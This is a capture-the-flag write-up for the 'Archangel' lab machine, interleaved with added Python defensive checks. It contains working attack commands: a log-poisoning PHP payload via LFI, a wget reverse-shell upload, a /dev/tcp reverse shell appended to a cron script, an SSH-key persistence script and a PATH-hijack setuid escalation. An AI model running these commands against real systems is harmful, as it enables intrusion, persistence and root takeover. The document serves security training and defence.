Archangel

Writeup.

Get a shell

1. Find a different hostname

mafialive.thm

2. Find flag 1

  • Add the domain name to /etc/hosts as: 10.10.224.98 mafialive.thm

3. Look for a page under development

test.php

4. Find flag 2

thm{explo1t1ng_lf1}

5. Get user shell & flag.

  • The hint said poison!!

  • Apache log poisoning it is!! (found via a Google search)

Log poisoning

  • I used the following curl command to poison the Apache access log (the PHP tag goes into the User-Agent header, Apache writes it into access.log, and the LFI in test.php then includes that log):

└─➜ curl "http://mafialive.thm/test.php?view=/var/www/html/development_testing/.././.././../log/apache2/access.log" -H "User-Agent: <?php system(\$_GET['cmd']) ?>"

Log poisoning successful!!

Reverse shell

  • I used Pentest Monkey's PHP reverse shell (revshell.php)

  • Start a Python HTTP server on your local machine and run the following command:

  • Make sure you change the IP and port first

└─➜ curl "http://mafialive.thm/test.php?view=/var/www/html/development_testing/.././.././../log/apache2/access.log&cmd=wget+YOUR_IP:PORT/revshell.php"

  • This copies the .php file onto the target machine using wget

  • Now when I visit MACHINE_IP/revshell.php I get a reverse shell
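As an added example that is not part of the original writeup, the Python below shows the defender's side of this chain: an include-path check that rejects the traversal used above, and a scanner that flags access-log lines carrying PHP tags in headers or traversal in the request. The challenge's real filter is not shown on the page; the `'../..'` substring blacklist in `naive_filter_allows` is an assumption used only to illustrate why substring filters fail. The sample log lines are constructed for this example.

```python
import os
import re
from urllib.parse import unquote

WEB_BASE = "/var/www/html/development_testing"
# The traversal string from the writeup, which resolves to Apache's access log.
LFI_PAYLOAD = "/var/www/html/development_testing/.././.././../log/apache2/access.log"


def naive_filter_allows(view):
    """Assumed blacklist for illustration: block only the literal '../..'.
    The payload above never contains that substring, so it passes."""
    return "../.." not in view


def resolve_view(view, base_dir=WEB_BASE):
    """Hardened replacement: normalise the path and require it to stay under base_dir.
    Returns the absolute path, or None when the request escapes the directory."""
    base = os.path.realpath(base_dir)
    raw = view if os.path.isabs(view) else os.path.join(base, view)
    candidate = os.path.realpath(raw)  # collapses ./ and ../ and follows symlinks
    if candidate == base or os.path.commonpath([base, candidate]) != base:
        return None
    return candidate


# Apache "combined" log format.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)
PHP_TAG = re.compile(r"<\?(php|=)", re.IGNORECASE)
TRAVERSAL = re.compile(r"\.\./|\.\.\\")
LOG_FILE = re.compile(r"/var/log/|(access|error)\.log")


def scan_access_log(text):
    """Return one finding per suspicious log line, with the reasons it was flagged."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        m = LOG_RE.match(line)
        if not m:
            continue
        reasons = []
        target = unquote(m.group("target"))  # decode %2e%2e%2f style encodings first
        if PHP_TAG.search(m.group("ua")) or PHP_TAG.search(m.group("referer")):
            reasons.append("php-tag-in-header")
        if TRAVERSAL.search(target):
            reasons.append("traversal-in-request")
        if LOG_FILE.search(target):
            reasons.append("log-file-in-request")
        if reasons:
            findings.append({"line": lineno, "ip": m.group("ip"), "reasons": reasons})
    return findings


# Constructed sample log: IPs, timestamps and sizes are made up; line 2 mirrors
# the poisoning request from the writeup, line 3 is a normal include.
SAMPLE_LOG = """\
10.0.0.5 - - [17/Sep/2023:15:01:02 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.9 - - [17/Sep/2023:15:02:10 +0000] "GET /test.php?view=/var/www/html/development_testing/.././.././../log/apache2/access.log HTTP/1.1" 200 1024 "-" "<?php system($_GET['cmd']) ?>"
10.0.0.9 - - [17/Sep/2023:15:02:40 +0000] "GET /test.php?view=/var/www/html/development_testing/page.php HTTP/1.1" 200 300 "-" "curl/7.88.1"
"""

if __name__ == "__main__":
    print("naive filter allows payload:", naive_filter_allows(LFI_PAYLOAD))
    print("hardened resolver returns:", resolve_view(LFI_PAYLOAD))
    for finding in scan_access_log(SAMPLE_LOG):
        print(finding)
```

`resolve_view` is the check the vulnerable page lacks: after `realpath`, the payload collapses to `/var/log/apache2/access.log`, which is outside the web directory, so it is refused regardless of how the `..` segments were interleaved. The scanner flags the same request on all three counts, which is the signal to alert on in the web server logs.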

Flag

┌─[ ~/stuff/thm/archangel] [ 10.8.102.180]
└─➜ nc -nvlp 9001                                                                                   [0]
Connection from 10.10.1.211:59838
Linux ubuntu 4.15.0-123-generic #126-Ubuntu SMP Wed Oct 21 09:40:11 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
 15:03:46 up  1:03,  0 users,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ cat /home/archangel/user.txt
<REDACTED>

Root the machine

1. Get user 2 flag

  • There's a cronjob running a script in /opt (found through LinPEAS)

  • We have full write access to it, so let's edit it and get a stable shell

  • I am going to add my public key to archangel's authorized_keys

  • First, get an archangel shell by appending a reverse shell line to the cron script:

www-data@ubuntu:/opt$ echo "sh -i >& /dev/tcp/10.8.102.180/9099 0>&1" >> helloworld.sh

  • And we got the shell

└─➜ nc -nvlp 9099                                                                                                                                                                                             [0]
Connection from 10.10.1.211:41092
sh: 0: can't access tty; job control turned off
$ id
uid=1001(archangel) gid=1001(archangel) groups=1001(archangel)

---------- stabilize shell

└─➜ cat ssh.sh [0]
#!/bin/sh
# Run on the target as archangel: installs my public key so I can SSH in.

mkdir -p ~/.ssh
chmod 700 ~/.ssh

echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAACAQC18sGRBGlzuvZK0Koh9FX0TprCBJHe4H/piBsY6a66JaHHaCTAN73A1Sp1gQUEQRZrYBh1d59mHeEUK5IIlD+4slmQTs29mfkmYisTRWKzxyxdaCOrGaphdnVxFyPO4XP86DJQ2ejB/nQiiCsxa9CqVQix/m1C11cbuferNdkLezLWkP2O3VTeFswATTQaScSXu/hSHw3WoXOr1yS3Ceofmf5r1NvEZQC45eEqxa0ACiFBZY75A1EsDIYhsvpNeqbMtjLKq3GoA9TO6HnujGIjFgq5El9fMVDC9bxwNCTKXcvlv3YYKAJqY/fOs2EUj/nqwOj/ynXsTOY5vWM9MIvYtTra32IM1z6OpWKLPUOjJ22W8l6y+XfRfF6TGRNIes0mgclzdjWC9MHqiPGm68hQgF3Zm5PNBtP7n3j3UYzkZJLT2WlOff8osIGMIkROmlbnHxQR6mURgVBU5k+vH/P+iB9zLurB16ptI5vWEXoj6iz6p8Ip+0+sn/0a9hFWyPq9dPbUaRuHA1/Blyh6/7DA3JeOQ79RfCeIZA0JEEumsLDDhfUc7x2kGiSHt0uHZjBDEBM+oZm8dFO4fOXv/7JN1rE60J2zHRMz5YXKWFGMapq3PAAPKXbYW7A5PLjQEr80yEzf38GV1hKyvHI1IdNb21f/P7I08cijowmZ6mUhxQ== heapbytes@pm.me" > ~/.ssh/authorized_keys
chmod 600 ~/.ssh/authorized_keys

  • Start a Python server to host the script

└─➜ python3 -m http.server 1111                                                                                                                                                                             [130]
Serving HTTP on 0.0.0.0 port 1111 (http://0.0.0.0:1111/) ...
10.10.1.211 - - [17/Sep/2023 15:33:56] "GET /ssh.sh HTTP/1.1" 200 -
  • Now the SSH part: the target fetched ssh.sh from that server (the GET above), and once it has run I can SSH in as archangel with my key.
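An added example (not from the writeup) of the check a defender would run to catch the misconfiguration used here: parse a system crontab, locate the script each entry runs, and flag scripts that a non-root user could modify. The crontab text, file names and the `demo()` scenario are constructed; the real cron entry on the box is not shown on the page.

```python
import os
import stat
import tempfile


def parse_crontab(text, has_user_field=True):
    """Parse /etc/crontab-style lines (5 time fields, a user, then the command).
    Set has_user_field=False for per-user crontabs, which have no user column."""
    n = 6 if has_user_field else 5
    jobs = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or "=" in line.split()[0]:
            continue  # blank, comment or VAR=value line
        parts = line.split(None, n)
        if len(parts) != n + 1:
            continue
        jobs.append({
            "schedule": " ".join(parts[:5]),
            "user": parts[5] if has_user_field else None,
            "command": parts[n],
        })
    return jobs


def script_path(command):
    """First absolute path in the command, e.g. the script an interpreter is given."""
    return next((t for t in command.split() if t.startswith("/")), None)


def audit_cron_scripts(paths, trusted_uids=(0,)):
    """Return (path, reason) pairs for scripts that someone other than a trusted
    uid could alter, i.e. the condition that let www-data hijack helloworld.sh."""
    findings = []
    for p in paths:
        if p is None:
            continue
        if not os.path.exists(p):
            findings.append((p, "does not exist"))
            continue
        st = os.stat(p)
        if st.st_uid not in trusted_uids:
            findings.append((p, f"owned by uid {st.st_uid}, not a trusted uid"))
        if st.st_mode & (stat.S_IWGRP | stat.S_IWOTH):
            findings.append((p, "group/world writable"))
        pst = os.stat(os.path.dirname(p) or ".")
        if pst.st_mode & stat.S_IWOTH and not pst.st_mode & stat.S_ISVTX:
            findings.append((p, "parent directory world writable without sticky bit"))
    return findings


def demo():
    """Constructed scenario: one world-writable script (like helloworld.sh in the
    writeup) and one properly locked-down script, both owned by the current user."""
    with tempfile.TemporaryDirectory() as d:
        writable = os.path.join(d, "helloworld.sh")
        safe = os.path.join(d, "backup.sh")
        for p, mode in ((writable, 0o777), (safe, 0o755)):
            with open(p, "w") as fh:
                fh.write("#!/bin/sh\necho hello\n")
            os.chmod(p, mode)
        crontab = (
            "# constructed for this example\n"
            f"* * * * * archangel {writable}\n"
            f"*/5 * * * * root {safe}\n"
        )
        paths = [script_path(j["command"]) for j in parse_crontab(crontab)]
        findings = audit_cron_scripts(paths, trusted_uids=(0, os.getuid()))
        return {
            "helloworld.sh": [r for p, r in findings if p == writable],
            "backup.sh": [r for p, r in findings if p == safe],
        }


if __name__ == "__main__":
    for name, reasons in demo().items():
        print(name, "->", reasons or "ok")
```

The fix on the box is the mirror image of the finding: the script should be owned by root (or the cron user) and be mode 0755 or tighter, and any directory on the path to it should not be writable by the web server's account.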

2. Root flag

Question hint: "certain paths are dangerous"

  • Running the binary gives an error:

cp: cannot stat '/home/user/archangel/myfiles/*': No such file or directory

  • Taking note of the hint, my guess is that the binary calls cp by its bare name (looked up through PATH) rather than by an absolute path, so we can create our own cp and pwn the machine.

archangel@ubuntu:/tmp$ nano cp
archangel@ubuntu:/tmp$ cat cp
chmod +s /bin/bash
archangel@ubuntu:/tmp$ chmod 777 cp
  • I made it in /tmp

  • Now let's prepend /tmp to our PATH variable so our cp is found first

archangel@ubuntu:/tmp$ export PATH=/tmp:$PATH
archangel@ubuntu:/tmp$ echo $PATH
/tmp:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin
archangel@ubuntu:/tmp$

--------------- ROOT FLAG

archangel@ubuntu:/tmp$ cd
archangel@ubuntu:~$ cd secret/
archangel@ubuntu:~/secret$ ./backup
archangel@ubuntu:~/secret$ /bin/bash -p

bash-4.4# id
uid=1001(archangel) gid=1001(archangel) euid=0(root) egid=0(root) groups=0(root),1001(archangel)
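The root step relies on two conditions: a privileged program that calls `cp` through PATH rather than by absolute path, and a PATH entry the user can write to. As an added example that is not part of the writeup, this Python audit flags both: it lists PATH entries that could be hijacked (a world-writable directory such as /tmp placed ahead of the system directories is the case above), and it picks out command invocations given without an absolute path from a list of strings such as `strings` would pull from a binary. The sample strings, the tool list and the `demo()` directories are constructed for this example; the page shows only the cp error, not the binary's contents.

```python
import os
import stat
import tempfile

# Constructed stand-in for what `strings` might pull from a setuid helper.
# Only the cp error appears in the writeup; these lines are made up.
SAMPLE_STRINGS = [
    "cp /home/user/archangel/myfiles/* /home/archangel/backup",
    "/bin/tar czf /home/archangel/backup.tgz /home/archangel/backup",
    "Backup complete",
]

# Tools that privileged code commonly shells out to (assumed list for the example).
KNOWN_TOOLS = {"cp", "mv", "rm", "tar", "cat", "chmod", "chown", "sh", "bash", "ls"}


def audit_path(path_value):
    """Return (entry, reason) for PATH entries that could be hijacked: relative
    entries and directories that are world- or group-writable. A sticky bit does
    not help here, because lookup order, not file replacement, is the problem."""
    findings = []
    for entry in path_value.split(":"):
        if entry in ("", "."):
            findings.append((entry or "(empty)", "relative entry resolves to the current directory"))
            continue
        if not os.path.isabs(entry):
            findings.append((entry, "relative entry"))
            continue
        try:
            mode = os.stat(entry).st_mode
        except FileNotFoundError:
            findings.append((entry, "does not exist"))
            continue
        if mode & stat.S_IWOTH:
            findings.append((entry, "world writable"))
        elif mode & stat.S_IWGRP:
            findings.append((entry, "group writable"))
    return findings


def relative_invocations(lines, known=KNOWN_TOOLS):
    """Pick out strings that start with a known tool name given without a path,
    i.e. calls that will be resolved through PATH at run time."""
    hits = []
    for line in lines:
        tokens = line.split()
        if tokens and tokens[0] in known:
            hits.append(line)
    return hits


def demo():
    """Constructed scenario: a /tmp-like directory (mode 1777) placed first in
    PATH ahead of a normal 0755 bin directory, plus a trailing '.' entry."""
    with tempfile.TemporaryDirectory() as d:
        fake_tmp = os.path.join(d, "tmp")
        fake_bin = os.path.join(d, "bin")
        os.mkdir(fake_tmp)
        os.mkdir(fake_bin)
        os.chmod(fake_tmp, 0o1777)  # chmod after mkdir so the umask does not interfere
        os.chmod(fake_bin, 0o755)
        return [reason for _, reason in audit_path(f"{fake_tmp}:{fake_bin}:.")]


if __name__ == "__main__":
    print("PATH findings:", demo())
    print("relative invocations:", relative_invocations(SAMPLE_STRINGS))
```

Run against the PATH printed above, `/tmp` is the first entry flagged because it is world-writable, which is exactly why the forged `cp` wins the lookup. The corresponding fixes are to call helpers by absolute path (or reset PATH to a fixed value) inside any setuid program, and to keep user-writable directories out of PATH for privileged execution.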
